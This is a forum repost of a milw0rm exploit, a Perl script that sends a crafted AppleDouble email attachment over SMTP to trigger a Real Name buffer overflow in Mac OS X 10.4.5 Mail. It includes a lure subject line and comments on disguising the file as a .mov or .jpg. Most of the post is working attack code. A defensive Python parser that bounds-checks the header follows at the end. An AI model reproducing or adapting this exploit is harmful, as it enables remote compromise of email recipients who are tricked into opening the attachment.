Author Topic: Apple Mac OS X 10.4.5 (Real Name) Buffer Overflow Exploit from milw0rm  (Read 7826 times)

« on: May 22, 2006, 11:25:43 am »

# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
# Version 2.0.7 (746.2) on OSX 10.4.5 Build 8H14 + Security Update 2006-001 (PowerPC) v1.0
# RFC-1740 MIME-based Mac file buffer overflow
# AppleSingle file header:
# [4 byte magic number][4 byte version number][16 bytes of filler][2 byte number of entries][Entry...]
# Entry descriptor for each Entry:
# [4 byte entry id][4 byte offset][4 byte length]
# Real Name entry id is 0x03, Finder Info is 0x09 and Resource Fork is 0x02
# If this exploit is not working clean out your ~/Library/Mail Downloads folder
# ./ yourmac\
use IO::Socket;
use MIME::Base64;
$hostName = $ARGV[0];
$emailaddy = $ARGV[1];

$sock = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $hostName, PeerPort => 25, Type => SOCK_STREAM);
$sock or die "no socket :$!\n";
print $sock "EHLO []\r\n" .
"MAIL FROM:<root>\r\n" .   # This needs to be valid for what ever server you are using.
"RCPT TO:<$emailaddy>\r\n" .         # Target machine goes email address here.
"DATA\r\n" .
"Mime-Version: 1.0 (Apple Message framework v746.2)\r\n" .
"To: kfinisterre\\r\n" .
"Message-Id: <1AE65A5B-6E3A-479B-8ECB-8BC4D959A69A\\r\n" .
"Content-Type: multipart/mixed; boundary=Apple-Mail-3-188295813\r\n" .
"From: root <root>\r\n" .
"Subject: Dude you have to see this shit!\r\n" .
"Date: Mon, 6 Mar 2006 23:04:12 -0500\r\n" .
"X-Mailer: Apple Mail (2.746.2)\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Mail-3-188295813\r\n" .
"Content-Type: multipart/appledouble;\r\n" .
"\tboundary=Apple-Mail-4-188295813\r\n" .
"Content-Disposition: attachment\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Mail-4-188295813\r\n" .
"Content-Transfer-Encoding: base64\r\n" .
"Content-Type: application/applefile;\r\n" .
"\tname=\"\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*\r\n" .

$retaddr = "\x41\x42\x43\x44";  # Shit the spec says printable ASCII!

$bufferz  =

"\x00\x05\x16\x07".   # AppleDouble Magic Number
"\x00\x02\x00\x00".   # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".   # 16 Bytes of <null> filler
"\x00\x03\x00\x00".   # Number of entries (3)
"\x00\x09\x00\x00".   # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00".   # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00".   # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00".   # Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00".   # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00".   # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00".   # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00".   # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00".   # Length of Resource fork is 0x053a
"\x00\x00\x00\x00".   # <null> filler
"\x00\x00\x00\x00".   # <null> filler
"aa" x 109 . "0000" . "1111" .  "2222" . "$retaddr" x 1 . "3333" . "" . # remember this length is hard coded above.
# Anything over 11 chars is here not seen by the user try Something like
# or don't forget the trailing '.' both .mov and .jpg work well from a Visual standpoint
# No fscking clue what this is... it is stolen from MetaSploit.
# I think its just a resource fork.

print $sock encode_base64($bufferz) .
"\r\n" .
"--Apple-Mail-4-188295813\r\n" .
"Content-Transfer-Encoding: 8bit\r\n" .
"Content-Id: <1A628FD3-CED7-4C69-B5A6-5ABA7AEB2891\@local>\r\n" .
"Content-Type: video/quicktime;\r\n" .
"\tx-mac-type=0;\r\n" .
"\tx-unix-mode=0755;\r\n" .
"\tx-mac-creator=0;\r\n" .
"\tname=\"\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*;\r\n" .
"\r\n" . "Z" x 90000 . "\r\n" .
"--Apple-Mail-4-188295813--\r\n" .
"\r\n" .
"--Apple-Mail-3-188295813--\r\n" .
sleep 2;  # Allow enough time for the message to process before leaving

# [2006-03-13]
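The header layout spelled out in the comments at the top of the script (magic, version, 16 bytes of filler, a two-byte entry count, then a 12-byte id/offset/length descriptor per entry) is exactly what a mail client's attachment parser has to bounds-check before it copies a Real Name anywhere. As an added defensive example, not part of the original post or of any Apple code, here is a Python parser that validates every descriptor against the real size of the blob and refuses to return a Real Name unless the whole header fits; the 255-byte name cap, the `build` helper and the sample blobs are assumptions constructed for this example.

```python
import struct
APPLESINGLE_MAGIC, APPLEDOUBLE_MAGIC = 0x00051600, 0x00051607
HEADER = struct.Struct(">II16sH")  # magic, version, 16-byte filler, 2-byte entry count
ENTRY = struct.Struct(">III")      # entry id, offset, length, all big-endian
REAL_NAME, FINDER_INFO = 3, 9
MAX_REAL_NAME = 255                # assumed cap on a file name; not a value from the page

def parse_entries(data):
    """Return (entries, problems); problems lists each way the header fails to fit data."""
    problems = []
    if len(data) < HEADER.size:
        return [], ["truncated header"]
    magic, version, _filler, count = HEADER.unpack_from(data, 0)
    if magic not in (APPLESINGLE_MAGIC, APPLEDOUBLE_MAGIC):
        problems.append("bad magic 0x%08x" % magic)
    if version != 0x00020000:
        problems.append("unexpected version 0x%08x" % version)
    table_end = HEADER.size + count * ENTRY.size
    if table_end > len(data):
        return [], problems + ["entry table of %d entries exceeds file" % count]
    entries = []
    for i in range(count):
        eid, off, ln = ENTRY.unpack_from(data, HEADER.size + i * ENTRY.size)
        entries.append((eid, off, ln))
        # offset and length are untrusted 32-bit fields: bound them by the real data size
        if off < table_end or off + ln > len(data):
            problems.append("entry %d: offset %d length %d outside payload" % (eid, off, ln))
        if eid == REAL_NAME and ln > MAX_REAL_NAME:
            problems.append("entry 3: Real Name length %d exceeds %d" % (ln, MAX_REAL_NAME))
    return entries, problems

def real_name(data):
    """Return the Real Name bytes only when the whole header validates, else None."""
    entries, problems = parse_entries(data)
    if problems:
        return None
    return next((data[off:off + ln] for eid, off, ln in entries if eid == REAL_NAME), None)

def build(parts, magic=APPLEDOUBLE_MAGIC):
    """Assemble a blob from [(entry id, payload)] so samples can be constructed."""
    table, body, off = b"", b"", HEADER.size + len(parts) * ENTRY.size
    for eid, payload in parts:
        table += ENTRY.pack(eid, off, len(payload))
        body, off = body + payload, off + len(payload)
    return HEADER.pack(magic, 0x00020000, b"\0" * 16, len(parts)) + table + body

# Constructed samples: a well-formed file, and one whose Real Name descriptor claims
# 8 bytes that the truncated blob no longer carries.
GOOD = build([(FINDER_INFO, b"\0" * 10), (REAL_NAME, b"photo.jpg")])
BAD = build([(FINDER_INFO, b"\0" * 10), (REAL_NAME, b"A" * 8)])[:-4]
```

The same check rejects a descriptor whose offset points back into the header or whose length claims more than the declared cap, which is the class of header a client should drop rather than trust.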
